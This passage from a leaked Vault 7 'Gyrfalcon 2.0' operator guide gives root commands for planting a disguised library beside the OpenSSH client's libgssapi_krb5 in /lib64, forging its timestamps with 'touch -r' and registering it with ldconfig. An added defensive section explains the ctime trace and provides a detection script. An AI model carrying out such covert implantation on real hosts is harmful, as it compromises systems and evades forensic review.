Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
SECRET//NOFORN Gyrfalcon 2.0
4.5.4 config_file (named in step 4.3.4)
4.5.5 client (renamed in step 2 and named in step 4.3.6)
4.5.6 libgssapi.so.2.0.1
4.5.7 (U) To confirm the archive file contents:
4.5.7.1 tar jtvf archive_file
5. (S//NF) Upload the library, application, and encrypted configuration file to the target platform.
5.1 (U) They must be extracted from the archive file before uploading.
5.1.1 tar jxvf archive_file libgssapi.so.2.0.1
5.1.2 tar jxvf archive_file client
5.1.3 tar jxvf archive_file config_file
5.2 (S//NF) Gyrfalcon does not provide any communication services between the local
operator computer and target platform. The operator must use a third-party application to
upload these three files to the target platform.
6. (S//NF) If not already in the proper locations after upload, copy the library, application, and
encrypted configuration file to the correct directory(ies).
6.1 (S//NF) The application and encrypted configuration file must be kept in the same
directory of the operator's choosing, but preferably the operator will choose the JQC/KitV
hidden directory.
6.2 (S//NF) The library needs to be installed in a system library directory (i.e., /lib64 or
/usr/lib) on the target platform that is accessible by the OpenSSH client (i.e., /usr/bin/ssh).
6.2.1 ldd /usr/bin/ssh.
6.2.2 (U) Look for an entry in the output similar to –
6.2.2.1 “libgssapi_krb5.so.2 => /lib64/libgssapi_krb5.so.2”
6.2.3 (S//NF) The operator should copy the Gyrfalcon library to the same directory as
“libgssapi_krb5.so.2” (i.e., /lib64).
6.2.3.1 (as root) cp libgssapi.so.2.0.1 /lib64/
6.2.4 (S//NF) Change the Gyrfalcon library's access time to that of libgssapi_krb5.
6.2.4.1 (as root) touch /lib64/libgssapi.so.2.0.1 -r /lib64/libgssapi_krb5.so.2.2.
6.2.5 (S//NF) Install the Gyrfalcon library into the dynamic linker cache.
6.2.5.1 (as root) ldconfig -v
6.2.6 (S//NF) Confirm the following files are in the system library directory identified
in step 6.2.2:
6.2.6.1 ls -l /lib64/libgssapi*
6.2.6.2 libgssapi.so.2 (a symbolic link to the actual library)
6.2.6.3 libgssapi.so.2.0.1 (the actual library)
6.2.7 (S//NF) Confirm the Gyrfalcon library is installed in the dynamic linker cache.
6.2.7.1 ldconfig -p | grep libgssapi
8 SECRET//NOFORN//20381126 November 2013
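
From a defender's side, steps 6.2.3 to 6.2.5 leave a checkable trace: `touch -r` copies the access and modification times from the reference library but cannot set the inode change time (ctime). The following is an added example, not part of the original document: it audits a library directory for `libgssapi.so*` files whose mtime exactly matches a sibling while the ctime is much later. The function names, the one-hour threshold and the fixture are assumptions, and a hit is a lead to confirm with the package manager (`rpm -qf` or `dpkg -S`), not proof.

```python
import os
import stat
import tempfile

# File-name prefix taken from the page (libgssapi.so.2.0.1); everything else is assumed.
SUSPECT_PREFIX = "libgssapi.so"

def audit_lib_dir(lib_dir, min_gap_seconds=3600):
    """Report libgssapi.so* files whose timestamps look copied from a sibling."""
    entries = {}
    for name in os.listdir(lib_dir):
        st = os.lstat(os.path.join(lib_dir, name))
        if stat.S_ISREG(st.st_mode):  # symlinks such as libgssapi.so.2 are skipped
            entries[name] = st
    findings = []
    for name, st in sorted(entries.items()):
        if not name.startswith(SUSPECT_PREFIX):
            continue
        # An exact mtime match with a sibling is consistent with touch -r,
        # although files installed from one package can share an mtime too.
        twins = sorted(n for n, o in entries.items()
                       if n != name and o.st_mtime_ns == st.st_mtime_ns)
        # ctime is not settable with touch, so it still records when the
        # file was really written or last had its metadata changed.
        gap = st.st_ctime - st.st_mtime
        findings.append({"file": name, "mtime_twins": twins,
                         "ctime_gap_seconds": gap,
                         "suspicious": bool(twins) and gap >= min_gap_seconds})
    return findings

def build_constructed_sample(lib_dir):
    """Constructed fixture: a reference library plus a file stamped from it."""
    ref = os.path.join(lib_dir, "libgssapi_krb5.so.2.2")
    new = os.path.join(lib_dir, "libgssapi.so.2.0.1")
    for path in (ref, new):
        with open(path, "wb") as fh:
            fh.write(b"constructed placeholder, not a real library\n")
    old = 1_300_000_000 * 10**9  # constructed install date, in nanoseconds
    os.utime(ref, ns=(old, old))
    ref_st = os.stat(ref)
    os.utime(new, ns=(ref_st.st_atime_ns, ref_st.st_mtime_ns))  # same effect as touch -r
    os.symlink("libgssapi.so.2.0.1", os.path.join(lib_dir, "libgssapi.so.2"))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        build_constructed_sample(d)
        for finding in audit_lib_dir(d):
            print(finding)
```

On a live host, point `audit_lib_dir` at the directory that `ldd /usr/bin/ssh` reports for `libgssapi_krb5.so.2`, and compare the result with `ldconfig -p | grep libgssapi`.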